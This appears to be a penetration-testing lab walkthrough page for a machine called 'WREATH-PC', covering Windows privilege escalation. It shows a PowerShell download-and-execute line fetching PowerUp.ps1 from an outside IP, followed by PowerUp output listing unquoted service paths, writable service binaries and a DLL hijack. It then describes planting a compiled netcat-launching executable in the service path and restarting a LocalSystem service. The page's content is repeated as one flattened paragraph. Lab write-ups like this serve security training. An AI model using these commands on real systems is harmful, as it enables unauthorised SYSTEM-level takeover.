Priv Esc

powershell "IEX(New-Object Net.WebClient).downloadString('http://10.50.102.164/PowerUp.ps1');Invoke-Allchecks"
Privilege   : SeImpersonatePrivilege
Attributes  : SE_PRIVILEGE_ENABLED_BY_DEFAULT, SE_PRIVILEGE_ENABLED
TokenHandle : 2112
ProcessId   : 788
Name        : 788
Check       : Process Token Privileges

ServiceName    : SystemExplorerHelpService
Path           : C:\Program Files (x86)\System Explorer\System Explorer\service\SystemExplorerService64.exe
ModifiablePath : @{ModifiablePath=C:\; IdentityReference=BUILTIN\Users; Permissions=AppendData/AddSubdirectory}
StartName      : LocalSystem
AbuseFunction  : Write-ServiceBinary -Name 'SystemExplorerHelpService' -Path <HijackPath>
CanRestart     : True
Name           : SystemExplorerHelpService
Check          : Unquoted Service Paths

ServiceName    : SystemExplorerHelpService
Path           : C:\Program Files (x86)\System Explorer\System Explorer\service\SystemExplorerService64.exe
ModifiablePath : @{ModifiablePath=C:\; IdentityReference=BUILTIN\Users; Permissions=WriteData/AddFile}
StartName      : LocalSystem
AbuseFunction  : Write-ServiceBinary -Name 'SystemExplorerHelpService' -Path <HijackPath>
CanRestart     : True
Name           : SystemExplorerHelpService
Check          : Unquoted Service Paths

ServiceName    : SystemExplorerHelpService
Path           : C:\Program Files (x86)\System Explorer\System Explorer\service\SystemExplorerService64.exe
ModifiablePath : @{ModifiablePath=C:\Program Files (x86)\System Explorer; IdentityReference=BUILTIN\Users; 
                 Permissions=System.Object[]}
StartName      : LocalSystem
AbuseFunction  : Write-ServiceBinary -Name 'SystemExplorerHelpService' -Path <HijackPath>
CanRestart     : True
Name           : SystemExplorerHelpService
Check          : Unquoted Service Paths

ServiceName    : SystemExplorerHelpService
Path           : C:\Program Files (x86)\System Explorer\System Explorer\service\SystemExplorerService64.exe
ModifiablePath : @{ModifiablePath=C:\Program Files (x86)\System Explorer\System 
                 Explorer\service\SystemExplorerService64.exe; IdentityReference=BUILTIN\Users; 
                 Permissions=System.Object[]}
StartName      : LocalSystem
AbuseFunction  : Write-ServiceBinary -Name 'SystemExplorerHelpService' -Path <HijackPath>
CanRestart     : True
Name           : SystemExplorerHelpService
Check          : Unquoted Service Paths

ServiceName                     : SystemExplorerHelpService
Path                            : C:\Program Files (x86)\System Explorer\System 
                                  Explorer\service\SystemExplorerService64.exe
ModifiableFile                  : C:\Program Files (x86)\System Explorer\System 
                                  Explorer\service\SystemExplorerService64.exe
ModifiableFilePermissions       : {WriteOwner, Delete, WriteAttributes, Synchronize...}
ModifiableFileIdentityReference : BUILTIN\Users
StartName                       : LocalSystem
AbuseFunction                   : Install-ServiceBinary -Name 'SystemExplorerHelpService'
CanRestart                      : True
Name                            : SystemExplorerHelpService
Check                           : Modifiable Service Files

ModifiablePath    : C:\Users\Thomas\AppData\Local\Microsoft\WindowsApps
IdentityReference : WREATH-PC\Thomas
Permissions       : {WriteOwner, Delete, WriteAttributes, Synchronize...}
%PATH%            : C:\Users\Thomas\AppData\Local\Microsoft\WindowsApps
Name              : C:\Users\Thomas\AppData\Local\Microsoft\WindowsApps
Check             : %PATH% .dll Hijacks
AbuseFunction     : Write-HijackDll -DllPath 'C:\Users\Thomas\AppData\Local\Microsoft\WindowsApps\wlbsctrl.dll'

Key            : HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\SystemExplorerAutoStart
Path           : "C:\Program Files (x86)\System Explorer\System Explorer\SystemExplorer.exe" /TRAY
ModifiableFile : @{ModifiablePath=C:\; IdentityReference=BUILTIN\Users; Permissions=AppendData/AddSubdirectory}
Name           : HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\SystemExplorerAutoStart
Check          : Modifiable Registry Autorun

Key            : HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\SystemExplorerAutoStart
Path           : "C:\Program Files (x86)\System Explorer\System Explorer\SystemExplorer.exe" /TRAY
ModifiableFile : @{ModifiablePath=C:\; IdentityReference=BUILTIN\Users; Permissions=WriteData/AddFile}
Name           : HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\SystemExplorerAutoStart
Check          : Modifiable Registry Autorun

Key            : HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\SystemExplorerAutoStart
Path           : "C:\Program Files (x86)\System Explorer\System Explorer\SystemExplorer.exe" /TRAY
ModifiableFile : @{ModifiablePath=C:\Program Files (x86)\System Explorer\System Explorer\SystemExplorer.exe; 
                 IdentityReference=BUILTIN\Users; Permissions=System.Object[]}
Name           : HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\SystemExplorerAutoStart
Check          : Modifiable Registry Autorun

Compiled malicious executable to run nc

copy C:\Users\Thomas\Documents\System.exe "C:\Program Files (x86)\System Explorer\"

sc stop SystemExplorerHelpService
sc start SystemExplorerHelpService

PreviousExploit NextExfil

powershell "IEX(New-Object Net.WebClient).downloadString('http://10.50.102.164/PowerUp.ps1');Invoke-Allchecks" Privilege : SeImpersonatePrivilege Attributes : SE_PRIVILEGE_ENABLED_BY_DEFAULT, SE_PRIVILEGE_ENABLED TokenHandle : 2112 ProcessId : 788 Name : 788 Check : Process Token Privileges ServiceName : SystemExplorerHelpService Path : C:\Program Files (x86)\System Explorer\System Explorer\service\SystemExplorerService64.exe ModifiablePath : @{ModifiablePath=C:\; IdentityReference=BUILTIN\Users; Permissions=AppendData/AddSubdirectory} StartName : LocalSystem AbuseFunction : Write-ServiceBinary -Name 'SystemExplorerHelpService' -Path <HijackPath> CanRestart : True Name : SystemExplorerHelpService Check : Unquoted Service Paths ServiceName : SystemExplorerHelpService Path : C:\Program Files (x86)\System Explorer\System Explorer\service\SystemExplorerService64.exe ModifiablePath : @{ModifiablePath=C:\; IdentityReference=BUILTIN\Users; Permissions=WriteData/AddFile} StartName : LocalSystem AbuseFunction : Write-ServiceBinary -Name 'SystemExplorerHelpService' -Path <HijackPath> CanRestart : True Name : SystemExplorerHelpService Check : Unquoted Service Paths ServiceName : SystemExplorerHelpService Path : C:\Program Files (x86)\System Explorer\System Explorer\service\SystemExplorerService64.exe ModifiablePath : @{ModifiablePath=C:\Program Files (x86)\System Explorer; IdentityReference=BUILTIN\Users; Permissions=System.Object[]} StartName : LocalSystem AbuseFunction : Write-ServiceBinary -Name 'SystemExplorerHelpService' -Path <HijackPath> CanRestart : True Name : SystemExplorerHelpService Check : Unquoted Service Paths ServiceName : SystemExplorerHelpService Path : C:\Program Files (x86)\System Explorer\System Explorer\service\SystemExplorerService64.exe ModifiablePath : @{ModifiablePath=C:\Program Files (x86)\System Explorer\System Explorer\service\SystemExplorerService64.exe; IdentityReference=BUILTIN\Users; Permissions=System.Object[]} StartName : LocalSystem AbuseFunction : Write-ServiceBinary -Name 'SystemExplorerHelpService' -Path <HijackPath> CanRestart : True Name : SystemExplorerHelpService Check : Unquoted Service Paths ServiceName : SystemExplorerHelpService Path : C:\Program Files (x86)\System Explorer\System Explorer\service\SystemExplorerService64.exe ModifiableFile : C:\Program Files (x86)\System Explorer\System Explorer\service\SystemExplorerService64.exe ModifiableFilePermissions : {WriteOwner, Delete, WriteAttributes, Synchronize...} ModifiableFileIdentityReference : BUILTIN\Users StartName : LocalSystem AbuseFunction : Install-ServiceBinary -Name 'SystemExplorerHelpService' CanRestart : True Name : SystemExplorerHelpService Check : Modifiable Service Files ModifiablePath : C:\Users\Thomas\AppData\Local\Microsoft\WindowsApps IdentityReference : WREATH-PC\Thomas Permissions : {WriteOwner, Delete, WriteAttributes, Synchronize...} %PATH% : C:\Users\Thomas\AppData\Local\Microsoft\WindowsApps Name : C:\Users\Thomas\AppData\Local\Microsoft\WindowsApps Check : %PATH% .dll Hijacks AbuseFunction : Write-HijackDll -DllPath 'C:\Users\Thomas\AppData\Local\Microsoft\WindowsApps\wlbsctrl.dll' Key : HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\SystemExplorerAutoStart Path : "C:\Program Files (x86)\System Explorer\System Explorer\SystemExplorer.exe" /TRAY ModifiableFile : @{ModifiablePath=C:\; IdentityReference=BUILTIN\Users; Permissions=AppendData/AddSubdirectory} Name : HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\SystemExplorerAutoStart Check : Modifiable Registry Autorun Key : HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\SystemExplorerAutoStart Path : "C:\Program Files (x86)\System Explorer\System Explorer\SystemExplorer.exe" /TRAY ModifiableFile : @{ModifiablePath=C:\; IdentityReference=BUILTIN\Users; Permissions=WriteData/AddFile} Name : HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\SystemExplorerAutoStart Check : Modifiable Registry Autorun Key : HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\SystemExplorerAutoStart Path : "C:\Program Files (x86)\System Explorer\System Explorer\SystemExplorer.exe" /TRAY ModifiableFile : @{ModifiablePath=C:\Program Files (x86)\System Explorer\System Explorer\SystemExplorer.exe; IdentityReference=BUILTIN\Users; Permissions=System.Object[]} Name : HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\SystemExplorerAutoStart Check : Modifiable Registry Autorun